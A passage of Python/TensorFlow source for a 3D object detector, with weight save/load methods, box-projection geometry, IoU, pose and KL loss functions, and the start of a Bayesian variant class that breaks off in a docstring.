file_name = self._enc_backbone_str['name']
self._encoder_core.save_weights(os.path.join(save_path, file_name))
def saveEncoderHead(self, save_path):
file_name = self._enc_backbone_str['name'] + '_head'
self._encoder_core_head.save_weights(os.path.join(save_path, file_name))
file_name = self._enc_head_str['name']
self._encoder_head.save_weights(os.path.join(save_path, file_name))
def saveEncoder(self, save_path):
self.saveEncoderBackbone(save_path=save_path)
self.saveEncoderHead(save_path=save_path)
def saveDecoder(self, save_path):
file_name = self._dec_str['name']
self._decoder.save_weights(os.path.join(save_path, file_name))
def savePriornet(self, save_path):
file_name = self._prior_str['name']
self._priornet_car.save_weights(os.path.join(save_path, file_name))
def saveClassifier(self, save_path):
file_name = 'classifier'
self._classifier.save_weights(os.path.join(save_path, file_name))
def saveModel(self, save_path):
self.saveEncoder(save_path=save_path)
self.saveDecoder(save_path=save_path)
self.savePriornet(save_path=save_path)
self.saveClassifier(save_path=save_path)
def loadEncoderBackbone(self, load_path, file_name=None):
if file_name == None:
file_name = self._enc_backbone_str['name']
self._encoder_core.load_weights(os.path.join(load_path, file_name))
def loadEncoderHead(self, load_path):
file_name = self._enc_backbone_str['name'] + '_head'
self._encoder_core_head.load_weights(os.path.join(load_path, file_name))
file_name = self._enc_head_str['name']
self._encoder_head.load_weights(os.path.join(load_path, file_name))
def loadEncoder(self, load_path):
self.loadEncoderBackbone(load_path=load_path)
self.loadEncoderHead(load_path=load_path)
def loadDecoder(self, load_path, file_name=None):
if file_name == None:
file_name = self._dec_str['name']
self._decoder.load_weights(os.path.join(load_path, file_name))
def loadPriornet(self, load_path):
file_name = self._prior_str['name']
self._priornet_car.load_weights(os.path.join(load_path, file_name))
def loadClassifier(self, load_path):
file_name = 'classifier'
self._classifier.load_weights(os.path.join(load_path, file_name))
def loadModel(self, load_path):
self.loadEncoder(load_path=load_path)
self.loadDecoder(load_path=load_path)
self.loadPriornet(load_path=load_path)
self.loadClassifier(load_path=load_path)
def _getInputs(self, inputs):
    """Unpack one training batch into instance attributes and convert each
    element to a tensor.

    The unpack order below is the batch contract with the data loader —
    do not reorder.  Also precomputes sin/cos of the ground-truth angle.
    """
    self._offset_x, self._offset_y, self._input_images,\
    self._objness_gt, self._objnessCar_gt,\
    self._bbox2D_dim_gt, self._bbox2D_xy_gt, self._bbox3D_dim_gt,\
    self._localXYZ_gt, self._rad_gt, \
    self._bbox3D8Points_gt,\
    self._image_size, self._P2_gt, self._P2_inv_gt, self._category_gt, \
    self._output_images_gt, self._carInstList, \
    self._anchor_z, self._anchor_bbox3D = inputs
    # self._output_images_gt, self._inst_vectors_gt, \
    self._offset_x = tf.convert_to_tensor(self._offset_x)
    self._offset_y = tf.convert_to_tensor(self._offset_y)
    self._input_images = tf.convert_to_tensor(self._input_images)
    self._objness_gt = tf.convert_to_tensor(self._objness_gt)
    self._objnessCar_gt = tf.convert_to_tensor(self._objnessCar_gt)
    self._bbox2D_dim_gt = tf.convert_to_tensor(self._bbox2D_dim_gt)
    self._bbox2D_xy_gt = tf.convert_to_tensor(self._bbox2D_xy_gt)
    self._bbox3D_dim_gt = tf.convert_to_tensor(self._bbox3D_dim_gt)
    self._localXYZ_gt = tf.convert_to_tensor(self._localXYZ_gt)
    self._rad_gt = tf.convert_to_tensor(self._rad_gt)
    self._bbox3D8Points_gt = tf.convert_to_tensor(self._bbox3D8Points_gt)
    # print(self._bbox3D8Points_gt.shape)
    self._image_size = tf.convert_to_tensor(self._image_size)
    self._P2_gt = tf.convert_to_tensor(self._P2_gt)
    self._P2_inv_gt = tf.convert_to_tensor(self._P2_inv_gt)
    self._category_gt = tf.convert_to_tensor(self._category_gt)
    self._output_images_gt = tf.convert_to_tensor(self._output_images_gt)
    self._carInstList = tf.convert_to_tensor(self._carInstList)
    self._anchor_z = tf.convert_to_tensor(self._anchor_z)
    self._anchor_bbox3D = tf.convert_to_tensor(self._anchor_bbox3D)
    # Angle targets are regressed as (sin, cos) pairs downstream.
    self._sin_gt = tf.sin(self._rad_gt)
    self._cos_gt = tf.cos(self._rad_gt)
def _calcEncoderOutput(self):
self._encOutPartitioning()
self._selectObjAndSampling()
self._calcXYZ()
self._calcBbox3Dand2D()
self._getbbox2DIOU()
def _getEncoderLoss(self):
self._bbox2DLoss()
self._objnessLoss()
self._bbox2DLossCIOU()
self._bbox3DLoss()
self._bbox3DIoULoss()
self._localXYZLoss()
self._poseLoss()
self._classificationLoss()
def _getDecoderAndPriorLoss(self):
self._objLatentAndShapeLoss()
self._priorRegLoss()
def _encOutPartitioning(self):
    """Split the encoder's last channel axis into per-predictor heads.

    For each of the `predictor_num` predictors, consecutive channel slices
    are taken in this fixed order: objness (1), bbox2D xy, bbox3D dims,
    local Z, latent mean, latent log-var, sin, cos (widths come from the
    backbone config).  Per-predictor lists are then stacked and moved to
    a trailing predictor axis via transpose, with activations applied.
    """
    pr_num = self._enc_backbone_str['predictor_num']
    self._objness, self._bbox2D_xy, self._bbox3D_dim, self._localZ = [], [], [], []
    self._latent_mean, self._latent_log_var = [], []
    self._sin, self._cos = [], []
    # Running [part_start, part_end) window over the channel axis.
    part_start = 0
    part_end = part_start
    for predIndex in range(pr_num):
        # objectness
        part_end += 1
        self._objness.append(self._enc_output[..., part_start:part_end])
        part_start = part_end
        part_end += self._enc_backbone_str['bbox2DXY_dim']
        self._bbox2D_xy.append(self._enc_output[..., part_start:part_end])
        part_start = part_end
        part_end += self._enc_backbone_str['bbox3D_dim']
        self._bbox3D_dim.append(self._enc_output[..., part_start:part_end])
        part_start = part_end
        part_end += self._enc_backbone_str['localXYZ_dim']
        self._localZ.append(self._enc_output[..., part_start:part_end])
        part_start = part_end
        part_end += self._enc_backbone_str['latent_dim']
        self._latent_mean.append(self._enc_output[..., part_start:part_end])
        part_start = part_end
        part_end += self._enc_backbone_str['latent_dim']
        self._latent_log_var.append(self._enc_output[..., part_start:part_end])
        part_start = part_end
        part_end += self._enc_backbone_str['orientation_dim']
        self._sin.append(self._enc_output[..., part_start:part_end])
        part_start = part_end
        part_end += self._enc_backbone_str['orientation_dim']
        self._cos.append(self._enc_output[..., part_start:part_end])
        part_start = part_end
        # part_end += self._enc_backbone_str['orientation_dim']
        # self._rad_log_var.append(self._enc_output[..., part_start:part_end])
        # part_start = part_end
    # print(part_end)

    # Stack per-predictor slices and move the predictor axis before the
    # channel axis; apply the head-specific activations/transforms.
    self._objness = tf.sigmoid(tf.transpose(tf.stack(self._objness), [1, 2, 3, 0, 4]))
    self._bbox2D_xy = tf.sigmoid(tf.transpose(tf.stack(self._bbox2D_xy), [1, 2, 3, 0, 4]))
    self._bbox3D_dim = tf.transpose(tf.stack(self._bbox3D_dim), [1, 2, 3, 0, 4])
    # Box dims: clip the log-scale residual, then scale the anchor box.
    self._bbox3D_dim = tf.clip_by_value(self._bbox3D_dim, clip_value_min=-3.0, clip_value_max=3.0)
    self._bbox3D_dim = tf.exp(self._bbox3D_dim) * self._anchor_bbox3D
    # print(self._bbox3D_dim.shape)
    # Depth: residual added to the per-cell anchor depth.
    self._localZ = tf.transpose(tf.stack(self._localZ), [1, 2, 3, 0, 4])
    self._localZ = self._localZ + tf.expand_dims(self._anchor_z, axis=-1)
    self._latent_mean = tf.transpose(tf.stack(self._latent_mean), [1, 2, 3, 0, 4])
    self._latent_log_var = tf.transpose(tf.stack(self._latent_log_var), [1, 2, 3, 0, 4])
    # Orientation is predicted as tanh-bounded (sin, cos).
    self._sin = tf.tanh(tf.transpose(tf.stack(self._sin), [1, 2, 3, 0, 4]))
    self._cos = tf.tanh(tf.transpose(tf.stack(self._cos), [1, 2, 3, 0, 4]))
    # self._rad_log_var = tf.transpose(tf.stack(self._rad_log_var), [1, 2, 3, 0, 4])
    # print(self._localZ.shape)
    # print(self._bbox3D_dim.shape)
def _matmul3x1(self, a, b):
    """Batched (..., 3, 3) @ (..., 3) matrix-vector product.

    Broadcasts `b` against the rows of `a` and sums over the last axis,
    which is equivalent to a matmul on the trailing dimensions.
    """
    b_as_row = tf.expand_dims(b, axis=-2)
    return tf.reduce_sum(a * b_as_row, axis=-1)
def _matmul4x1(self, a, b):
    """Batched (..., 4, 4) @ (..., 4) matrix-vector product.

    Same broadcasting trick as _matmul3x1, for homogeneous 4-vectors.
    """
    b_as_row = tf.expand_dims(b, axis=-2)
    return tf.reduce_sum(a * b_as_row, axis=-1)
def _get3DBboxAnd2DPorj(self, projmat, R, t, lhw):
    """Build the 8 corners of the 3D box and its projected 2D bounds.

    Args (trailing dims shown; leading dims are (batch, gridrow, gridcol, pred)):
        projmat: (..., 4, 4) camera projection matrix.
        R: (..., 3, 3) rotation matrix.
        t: (..., 3) translation, i.e. box center in the camera frame.
        lhw: (..., 3) box dimensions -- presumably (length, height, width)
            per the name; TODO confirm against the data pipeline.

    Returns:
        (corners, bounds): corners is (..., 8, 3) in 3D; bounds is
        (..., 4) = [x1, y1, x2, y2] of the projection, normalized by
        self._image_size.
    """
    # projmat : (batch, gridrow, girdcol, pred, 4x4)
    # R : (batch, gridrow, gridcol, pred, 3x3)
    # t : (batch, gridrow, gridcol, pred, 3)
    # lhw : (batch, gridrow, gridcol, pred, 3)
    # Start from the (-l/2, -h/2, -w/2) corner; the nested loops flip each
    # sign in turn so all 8 corner offsets are enumerated exactly once.
    dx, dy, dz = -lhw[...,0]/2., -lhw[...,1]/2., -lhw[...,2]/2.
    dxdydz = []
    for i in range(2):
        dy = -1. * dy
        for j in range(2):
            dx = -1. * dx
            for k in range(2): # [x,y,z], [
                dz = -1. * dz
                dxdydz.append(tf.stack([dx,dy,dz], axis=-1)) #(8, b,gr,gc,pr,3)
    dxdydz = tf.transpose(tf.stack(dxdydz), [1,2,3,4,0,5]) #(b,gr,gc,pr,8,3)
    # Tile R and t across the 8 corners so the batched products line up.
    R_tile = tf.transpose(tf.stack([R]*8), [1,2,3,4,0,5,6])
    t_tile = tf.transpose(tf.stack([t]*8), [1,2,3,4,0,5])
    bbox3D8Points = self._matmul3x1(R_tile, dxdydz) + t_tile #(b,gr,gc,pr,8,3)
    # Homogeneous coordinates for the projection.
    x_4d = tf.concat([bbox3D8Points, tf.expand_dims(tf.ones_like(dxdydz[...,0]),axis=-1)], axis=-1) #(b,gr,gc,pr,8,4)
    projmat_tile = tf.transpose(tf.stack([projmat]*8), [1,2,3,4,0,5,6])
    bbox3D8PointsProj = self._matmul4x1(projmat_tile, x_4d)
    # Perspective divide; epsilon guards against zero depth.
    bbox3D8PointsProj = bbox3D8PointsProj[..., :2] / (tf.expand_dims(bbox3D8PointsProj[..., 2], axis=-1) + 1e-9)
    # print(bbox3D8PointsProj.shape)
    # select proj point
    # Axis-aligned 2D bounds of the projected corners, normalized by the
    # image size (x by _image_size[..., 0], y by [..., 1]).
    x1 = tf.reduce_min(bbox3D8PointsProj[..., 0], axis=-1) / self._image_size[..., 0] # (b,gr,gc,pr)
    x2 = tf.reduce_max(bbox3D8PointsProj[..., 0], axis=-1) / self._image_size[..., 0]
    y1 = tf.reduce_min(bbox3D8PointsProj[..., 1], axis=-1) / self._image_size[..., 1]
    y2 = tf.reduce_max(bbox3D8PointsProj[..., 1], axis=-1) / self._image_size[..., 1]
    # print(x1.shape)
    return bbox3D8Points, tf.stack([x1,y1,x2,y2], axis=-1) # (b,gr,gc,pr,4)
def _calcXYZ(self):
    """Back-project predicted 2D centers and depth into camera-frame XYZ.

    Converts the grid-relative center to image coordinates, multiplies by
    the predicted depth z to form homogeneous image-space points, then
    applies the inverse projection matrix P2^-1.
    Writes self._localXYZ with shape (..., 3).
    """
    len_grid_x, len_grid_y = tf.cast(tf.shape(self._offset_x)[2], tf.float32), tf.cast(tf.shape(self._offset_x)[1], tf.float32)
    # image_size : (row, col)
    # (cell-relative xy + grid offset) / grid size -> normalized image
    # coords; scaling by z yields x*z, y*z as expected by P2^-1.
    objCenter2D_xz = (self._bbox2D_xy[..., 0] + self._offset_x) / len_grid_x * self._image_size[..., 0] * self._localZ[..., 0]
    objCenter2D_yz = (self._bbox2D_xy[..., 1] + self._offset_y) / len_grid_y * self._image_size[..., 1] * self._localZ[..., 0]
    objCenter2D_xyz = tf.stack([objCenter2D_xz, objCenter2D_yz, self._localZ[...,0], tf.ones_like(self._localZ[...,0])], axis=-1)
    self._localXYZ = self._matmul4x1(self._P2_inv_gt, objCenter2D_xyz)[..., 0:3]
def _calcBbox3Dand2D(self):
    """Combine local orientation with the viewing ray to get the global yaw,
    then build the 3D box corners and their projected 2D bounds.

    Writes self._sin_ry / self._cos_ry, self._R (rotation about the camera
    y axis), self._bbox3D8Points and self._bbox2D_dim.
    """
    b, gr, gc, pr, _ = tf.shape(self._cos)
    # Viewing-ray direction in the x-z plane from the back-projected center.
    zx_norm = tf.sqrt(tf.square(self._localXYZ[..., -1]) + tf.square(self._localXYZ[..., 0]))
    s_ray = tf.expand_dims(self._localXYZ[..., 0] / zx_norm, axis=-1)
    c_ray = tf.expand_dims(self._localXYZ[..., -1] / zx_norm, axis=-1)
    # Detach the ray from the gradient. tf.stop_gradient replaces the old
    # tf.constant(x.numpy()) trick, which only works in eager execution and
    # would fail inside tf.function / graph mode.
    s_ray, c_ray = tf.stop_gradient(s_ray), tf.stop_gradient(c_ray)
    # Angle-sum identities: global yaw = local angle + ray angle.
    self._sin_ry = s_ray * self._cos + c_ray * self._sin
    self._cos_ry = c_ray * self._cos - s_ray * self._sin
    zero = tf.zeros_like(self._cos_ry)
    one = tf.ones_like(self._cos_ry)
    # Row-major 3x3 rotation about the camera y axis.
    self._R = tf.reshape(tf.concat([self._cos_ry, zero, self._sin_ry,
                                    zero, one, zero,
                                    -self._sin_ry, zero, self._cos_ry]
                                   , axis=-1), [b, gr, gc, pr, 3, 3])
    # The box dims are likewise detached so the corner-based losses do not
    # back-propagate into the dimension head through the geometry.
    self._bbox3D8Points, self._bbox2D_dim = self._get3DBboxAnd2DPorj(
        self._P2_gt, self._R, self._localXYZ, tf.stop_gradient(self._bbox3D_dim))
def _getbbox2DIOU(self):
    """Per-cell IoU and DIoU center-distance ratio for the 2D boxes.

    Writes self._IOU (clipped to [0, 1]) and self._RDIOU (squared center
    distance divided by the squared diagonal of the enclosing box).
    """
    gt = self._bbox2D_dim_gt
    pr = self._bbox2D_dim
    gx1, gy1, gx2, gy2 = gt[..., 0], gt[..., 1], gt[..., 2], gt[..., 3]
    px1, py1, px2, py2 = pr[..., 0], pr[..., 1], pr[..., 2], pr[..., 3]
    # Intersection rectangle, clamped at zero when the boxes do not overlap.
    ix = tf.maximum(tf.minimum(gx2, px2) - tf.maximum(gx1, px1), 0.0)
    iy = tf.maximum(tf.minimum(gy2, py2) - tf.maximum(gy1, py1), 0.0)
    inter = ix * iy
    area_gt = (gx2 - gx1) * (gy2 - gy1)
    area_pr = (px2 - px1) * (py2 - py1)
    union = tf.maximum(area_gt + area_pr - inter, 1e-9)
    self._IOU = tf.clip_by_value(inter / union, 0., 1.)
    # Smallest enclosing box; its squared diagonal normalizes the DIoU
    # center-distance term.
    ox = tf.maximum(tf.maximum(gx2, px2) - tf.minimum(gx1, px1), 0.)
    oy = tf.maximum(tf.maximum(gy2, py2) - tf.minimum(gy1, py1), 0.)
    diag2 = tf.maximum(tf.square(ox) + tf.square(oy), 1e-9)
    cx_gt, cy_gt = (gx2 + gx1) / 2., (gy2 + gy1) / 2.
    cx_pr, cy_pr = (px2 + px1) / 2., (py2 + py1) / 2.
    dist2 = tf.square(cx_gt - cx_pr) + tf.square(cy_gt - cy_pr)
    self._RDIOU = dist2 / diag2
def _bbox2DLoss(self):
    """YOLO-style 2D box regression losses.

    Writes self._loss_bbox2D_xy (cell-relative center error) and
    self._loss_bbox2D_hw (projected width/height error), each reduced to a
    per-batch-element scalar, and caches self._box_loss_scale, the usual
    (2 - w*h) up-weighting of small boxes.
    """
    # tile shape = (batch, gridy, gridx, 2*predictornum, hwxy)
    square_d_xy = tf.reduce_sum(tf.square(self._bbox2D_xy - self._bbox2D_xy_gt), axis=-1)
    h_pred = self._bbox2D_dim[..., 3] - self._bbox2D_dim[..., 1]
    w_pred = self._bbox2D_dim[..., 2] - self._bbox2D_dim[..., 0]
    h_gt = self._bbox2D_dim_gt[..., 3] - self._bbox2D_dim_gt[..., 1]
    w_gt = self._bbox2D_dim_gt[..., 2] - self._bbox2D_dim_gt[..., 0]
    obj_mask = tf.reshape(self._objness_gt, tf.shape(self._objness_gt)[:-1])
    d_h = obj_mask * (h_pred - h_gt)
    d_w = obj_mask * (w_pred - w_gt)
    # Detach the scale so it acts as a weight only. tf.stop_gradient replaces
    # the old tf.constant((...).numpy()), which only works in eager mode and
    # would break under tf.function / graph execution.
    self._box_loss_scale = tf.stop_gradient(2. - w_gt * h_gt)
    xy_loss = obj_mask * self._box_loss_scale * square_d_xy
    hw_loss = obj_mask * self._box_loss_scale * (tf.square(d_h) + tf.square(d_w))
    self._loss_bbox2D_xy = tf.reduce_sum(xy_loss, axis=[1, 2, 3])
    self._loss_bbox2D_hw = tf.reduce_sum(hw_loss, axis=[1, 2, 3])
def _objnessLoss(self):
    """Binary cross-entropy split into object / background terms.

    Writes self._loss_objness (all dims summed) and self._loss_no_objness
    (channel 0 only, summed over grid and predictor dims).
    """
    eps = 1e-10
    pos_term = -(self._objness_gt * tf.math.log(self._objness + eps))
    neg_term = -((1.0 - self._objness_gt) * tf.math.log(1.0 - self._objness + eps))
    # d_no_objness = self._ignore_mask * d_no_objness[..., 0]
    self._loss_objness = tf.reduce_sum(pos_term, axis=[1, 2, 3, 4])
    self._loss_no_objness = tf.reduce_sum(neg_term[..., 0], axis=[1, 2, 3])
def _smoothL1(self, x_src, x_trg, cond):
    """Huber-style smooth-L1 loss: quadratic within `cond` of the target,
    linear (offset by cond/2) outside it."""
    diff = tf.abs(x_src - x_trg)
    quadratic = 0.5 / cond * tf.square(x_src - x_trg)
    linear = diff - 0.5 * cond
    return tf.where(diff > cond, linear, quadratic)
def _bbox2DLossCIOU(self):
    """Complete-IoU (CIoU) loss plus a smooth-L1 corner term for 2D boxes.

    Consumes self._IOU and self._RDIOU from _getbbox2DIOU; writes
    self._loss_bbox2D_CIOU reduced to a per-batch-element scalar.
    """
    obj_mask = self._objness_gt[..., 0]
    pi = 3.14159265358979323846
    # Aspect-ratio consistency term v and trade-off weight alpha, following
    # the CIoU formulation. Box layout is [x1, y1, x2, y2].
    h_pred = self._bbox2D_dim[..., 3] - self._bbox2D_dim[..., 1]
    w_pred = self._bbox2D_dim[..., 2] - self._bbox2D_dim[..., 0]
    h_gt = self._bbox2D_dim_gt[..., 3] - self._bbox2D_dim_gt[..., 1]
    w_gt = self._bbox2D_dim_gt[..., 2] - self._bbox2D_dim_gt[..., 0]
    atan_gap = tf.atan(w_gt / (h_gt + 1e-9)) - tf.atan(w_pred / (h_pred + 1e-9))
    v = 4. / (pi * pi) * tf.square(atan_gap)
    alpha = v / (1. - self._IOU + v + 1e-9)
    ciou = obj_mask * (1. - self._IOU + self._RDIOU + alpha * v)
    corner = obj_mask * tf.reduce_sum(self._smoothL1(self._bbox2D_dim, self._bbox2D_dim_gt, 1e-4), axis=-1)
    self._loss_bbox2D_CIOU = tf.reduce_sum(ciou + corner, axis=[1, 2, 3])
def _bbox3DLoss(self):
    """Smooth-L1 regression on the 3D box dimensions, masked by objectness.

    Writes self._loss_bbox3D as a per-batch-element scalar.
    """
    dim_err = self._smoothL1(self._bbox3D_dim_gt, self._bbox3D_dim, cond=1e-5)
    self._loss_bbox3D = tf.reduce_sum(self._objness_gt * dim_err, axis=[1, 2, 3, 4])
def _bbox3DIoULoss(self):
    """3D-IoU loss plus a smooth-L1 term on the 8 box corners.

    Uses the external cal_iou_3d helper; writes self._loss_bbox3D_IoU as a
    per-batch-element scalar.
    """
    obj_mask = self._objness_gt[..., 0]
    iou3d = cal_iou_3d(box3d1=self._bbox3D8Points_gt, box3d2=self._bbox3D8Points,
                       lhw1=self._bbox3D_dim_gt, lhw2=self._bbox3D_dim)
    iou_loss = tf.reduce_sum(obj_mask * (1. - iou3d), axis=[1, 2, 3])
    # Corner regression, reduced over the (8 points, 3 coords) dims first.
    corner = tf.reduce_sum(self._smoothL1(self._bbox3D8Points, self._bbox3D8Points_gt, 0.01), axis=[4, 5])
    corner = tf.reduce_sum(obj_mask * corner, axis=[1, 2, 3])
    self._loss_bbox3D_IoU = iou_loss + corner
def _localXYZLoss(self):
    """Depth (z-only) regression loss, masked by objectness.

    Penalizes the squared error between the predicted localZ and the
    ground-truth z component. The commented lines are earlier Bayesian /
    smooth-L1 / full-XYZ variants kept for reference.
    """
    # loss_localXYZ_Bayesian = tf.square(self._localXYZ - self._localXYZ_gt) / (tf.exp(self._localXYZ_log_var) + 1e-9) + self._localXYZ_log_var
    # loss_localXYZ_Bayesian = self._localXYZ_log_var_tile
    # loss_localXYZ_Euclidian = tf.abs(self._localXYZ-self._localXYZ_gt)
    # loss_localXYZ_Euclidian = self._smoothL1(self._localXYZ, self._localXYZ_gt, 0.001) * tf.expand_dims(self._box_loss_scale, axis=-1)
    # loss_localXYZ_Euclidian = self._smoothL1(self._localXYZ, self._localXYZ_gt, 0.001)
    # loss_localXYZ_Euclidian = tf.square(self._localXYZ - self._localXYZ_gt)# * tf.expand_dims(self._box_loss_scale, axis=-1)
    loss_localXYZ_Euclidian = tf.expand_dims(tf.square(self._localZ[..., 0] - self._localXYZ_gt[..., 2]), axis=-1)# * tf.expand_dims(self._box_loss_scale, axis=-1)
    # loss_localXYZ = 0.1 * loss_localXYZ_Bayesian + 100.0 * loss_localXYZ_Euclidian
    # self._loss_localXYZ = tf.reduce_sum(self._objness_gt * 0.1 * loss_localXYZ_Bayesian, axis=[1, 2, 3, 4])
    # The loss tensor has a single trailing channel, so [..., -1] just
    # drops that channel after masking.
    self._loss_localXYZ = tf.reduce_sum((self._objness_gt * loss_localXYZ_Euclidian)[..., -1], axis=[1, 2, 3])
def _getEV(self, sin, cos, radLogVar):
    """Analytic moments of sin/cos of a Gaussian-distributed angle.

    For an angle with variance exp(radLogVar), returns the expectations of
    its sine and cosine and the log-variances of each (epsilon-stabilized).
    """
    var = tf.exp(radLogVar)        # angle variance
    shrink = tf.exp(-var / 2.0)    # expectation shrinkage factor
    shrink2 = tf.exp(-2.0 * var)
    Esin = shrink * sin
    Ecos = shrink * cos
    Varsin = 0.5 - 0.5 * shrink2 * (1.0 - 2.0 * sin * sin) - tf.exp(-var) * sin * sin
    Varcos = 0.5 + 0.5 * shrink2 * (2.0 * cos * cos - 1.0) - tf.exp(-var) * cos * cos
    return Esin, Ecos, tf.math.log(Varsin + 1e-7), tf.math.log(Varcos + 1e-7)
def _poseLoss(self):
    """Orientation loss on the predicted (sin, cos) pair.

    Combines a moment-matching term (via _getEV with the fixed angular
    variance self._rad_var) normalized by the ground-truth variances,
    inner/cross-product consistency terms against the ground truth, and a
    separate unit-norm penalty. Writes self._loss_sincos and
    self._loss_sincos1 per batch element.
    """
    Esin, Ecos, logvarsin, logvarcos = self._getEV(sin=self._sin, cos=self._cos, radLogVar=tf.math.log(self._rad_var))
    Esin_gt, Ecos_gt, logvarsin_gt, logvarcos_gt = self._getEV(sin=self._sin_gt, cos=self._cos_gt, radLogVar=tf.math.log(self._rad_var))
    # loss_sin_kl = kl_loss(mean=Esin, logVar=logvarsin, mean_target=Esin_gt, logVar_target=logvarsin_gt)
    # loss_cos_kl = kl_loss(mean=Ecos, logVar=logvarcos, mean_target=Ecos_gt, logVar_target=logvarcos_gt)
    # Variance-normalized moment matching.
    self._loss_sincos = tf.square(Esin-Esin_gt)/tf.exp(logvarsin_gt) + tf.square(Ecos-Ecos_gt)/tf.exp(logvarcos_gt)
    self._loss_sincos += tf.square(1. - (self._sin * self._sin_gt + self._cos * self._cos_gt)) # inner product
    self._loss_sincos += tf.square(self._sin - self._sin_gt) + tf.square(self._cos - self._cos_gt) # cross product, 1st and 2nd component
    self._loss_sincos += tf.square(self._sin * self._cos_gt - self._cos * self._sin_gt) # cross product, 3rd component
    # Encourage sin^2 + cos^2 == 1 so the pair stays a valid rotation.
    scsquaresum = tf.square(self._sin) + tf.square(self._cos)
    self._loss_sincos1 = tf.square(1. - scsquaresum)
    # self._loss_sincos_bayesian = tf.reduce_sum(self._objness_gt * self._loss_sincos_bayesian, axis=[1, 2, 3, 4])
    # obj_mask = self._objness_gt[..., 0]
    # self._loss_sincos_kl = tf.reduce_sum(obj_mask * (loss_sin_kl + loss_cos_kl), axis=[1, 2, 3])
    self._loss_sincos = tf.reduce_sum(self._objness_gt * self._loss_sincos, axis=[1, 2, 3, 4])
    self._loss_sincos1 = tf.reduce_sum(self._objness_gt * self._loss_sincos1, axis=[1, 2, 3, 4])
    # + 0.1 * tf.reduce_mean(self._loss_sincos1, axis=[1, 2, 3, 4])
def _classificationLoss(self):
    """Softmax cross-entropy over object categories.

    Note: overwrites self._category_pred with its softmax in place.
    """
    probs = tf.nn.softmax(self._category_pred)
    self._category_pred = probs
    self._loss_category = -tf.reduce_sum(self._category_gt * tf.math.log(probs + 1e-9), axis=-1)
def _selectObjAndSampling(self):
    """Gather latent stats at object cells and draw reparameterized samples.

    Uses tf.dynamic_partition with the integer objectness masks to keep
    only the latent means/log-vars at positive cells -- once for the
    car-only mask and once for all objects -- then samples z via the
    external `sampling` helper.
    """
    car_mask = tf.cast(self._objnessCar_gt[..., 0], tf.int32) # (batch, row, col)
    # Partition index 1 holds the entries where the mask is 1 (objects).
    self._latent_mean_car_sel = tf.dynamic_partition(self._latent_mean, car_mask, 2)[1]
    self._latent_log_var_car_sel = tf.dynamic_partition(self._latent_log_var, car_mask, 2)[1]
    self._z_car = sampling(mu=self._latent_mean_car_sel, logVar=self._latent_log_var_car_sel)
    obj_mask = tf.cast(self._objness_gt[..., 0], tf.int32)
    self._latent_mean_sel = tf.dynamic_partition(self._latent_mean, obj_mask, 2)[1]
    self._latent_log_var_sel = tf.dynamic_partition(self._latent_log_var, obj_mask, 2)[1]
    self._z = sampling(mu=self._latent_mean_sel, logVar=self._latent_log_var_sel)
def _objLatentAndShapeLoss(self):
    """KL divergence between selected car latents and the priornet output,
    plus the binary shape reconstruction loss (external kl_loss /
    binary_loss helpers)."""
    self._loss_latents_kl = kl_loss(mean=self._latent_mean_car_sel, logVar=self._latent_log_var_car_sel,
                                    mean_target=self._inst_mean_prior, logVar_target=self._inst_log_var_prior)
    self._loss_shape = binary_loss(xPred=self._outputs, xTarget=self._output_images_gt, gamma=0.60, b_range=False)
def _priorRegLoss(self):
    """Regularizer keeping the priornet latent means spread apart in
    z-space, with the target distance scaled by the latent dimensionality
    (external regulizer_loss helper)."""
    self._loss_prior_reg = regulizer_loss(z_mean=self._inst_mean_prior,
                                          z_logVar=self._inst_log_var_prior,
                                          dist_in_z_space=2.0 * self._enc_backbone_str['latent_dim'])
def _objnessEval(self):
    """Mean predicted confidence on object cells and mean (1 - confidence)
    on background cells; written to self._obj_prb / self._no_obj_prb."""
    axes = [1, 2, 3, 4]
    gt = self._objness_gt
    hit = tf.reduce_sum(gt * self._objness, axis=axes)
    self._obj_prb = hit / tf.reduce_sum(gt, axis=axes)
    miss = tf.reduce_sum((1.0 - gt) * (1.0 - self._objness), axis=axes)
    self._no_obj_prb = miss / tf.reduce_sum(1.0 - gt, axis=axes)
class nolbo_bayesian(object):
def __init__(self, nolbo_structure,
             backbone_style=None, encoder_backbone=None,
             learning_rate=1e-4,
             IoU2D_loss=True, IoU3D_loss=True, exp=False,
             solver='adam'):
    """Bayesian NOLBO detector.

    Args:
        nolbo_structure: dict with 'encoder_backbone' and 'encoder_head'
            sub-configs (names, channel dims, filter lists, ...).
        backbone_style: factory callable used to build the backbone when
            `encoder_backbone` is not supplied.
        encoder_backbone: optional pre-built backbone model.
        learning_rate: optimizer learning rate.
        IoU2D_loss / IoU3D_loss: toggle the CIoU / 3D-IoU terms in fit().
        exp: if True, localZ is decoded as exp(pred) * anchor instead of
            pred + anchor (see _encOutPartitioning).
        solver: 'adam' or 'sgd' (case-insensitive).

    Raises:
        ValueError: if `solver` names an unsupported optimizer.
    """
    self._enc_backbone_str = nolbo_structure['encoder_backbone']
    self._enc_head_str = nolbo_structure['encoder_head']
    # Fixed angular variance prior: (15 degrees)^2 in radians.
    self._rad_var = (15.0/180.0 * 3.141593) ** 2
    self._backbone_style = backbone_style
    self._encoder_backbone = encoder_backbone
    self._IoU2D_loss, self._IoU3D_loss = IoU2D_loss, IoU3D_loss
    self._exp = exp
    self._buildModel()
    if solver == 'adam' or solver == 'Adam':
        self._optimizer = tf.keras.optimizers.Adam(learning_rate=learning_rate)
    elif solver == 'sgd' or solver == 'SGD':
        self._optimizer = tf.keras.optimizers.SGD(learning_rate=learning_rate, momentum=0.9, decay=0.0005)
    else:
        # Previously an unknown solver silently left self._optimizer unset
        # and failed later with AttributeError in fit(); fail fast instead.
        raise ValueError("unsupported solver: %r (expected 'adam' or 'sgd')" % (solver,))
def _buildModel(self):
    """Instantiate the backbone (when not injected) and the detection head.

    The head's input shape is taken from the backbone's output shape, and
    its output channels from the encoder-head config.
    """
    print('build Models...')
    # `is None` rather than `== None` (PEP 8; == may invoke custom __eq__).
    if self._encoder_backbone is None:
        self._encoder_backbone = self._backbone_style(name=self._enc_backbone_str['name'])
    # ============== set encoder head
    self._encoder_head = darknet.head2D(name=self._enc_head_str['name'],
                                        input_shape=self._encoder_backbone.output_shape[1:],
                                        output_dim=self._enc_head_str['output_dim'],
                                        filter_num_list=self._enc_head_str['filter_num_list'],
                                        filter_size_list=self._enc_head_str['filter_size_list'],
                                        last_pooling=None, activation=self._enc_head_str['activation'])
    print('done')
def fit(self, inputs):
    """Run one training step on a batch.

    Unpacks the batch, runs backbone + head under a GradientTape, decodes
    the raw output, accumulates the weighted loss terms, applies gradients,
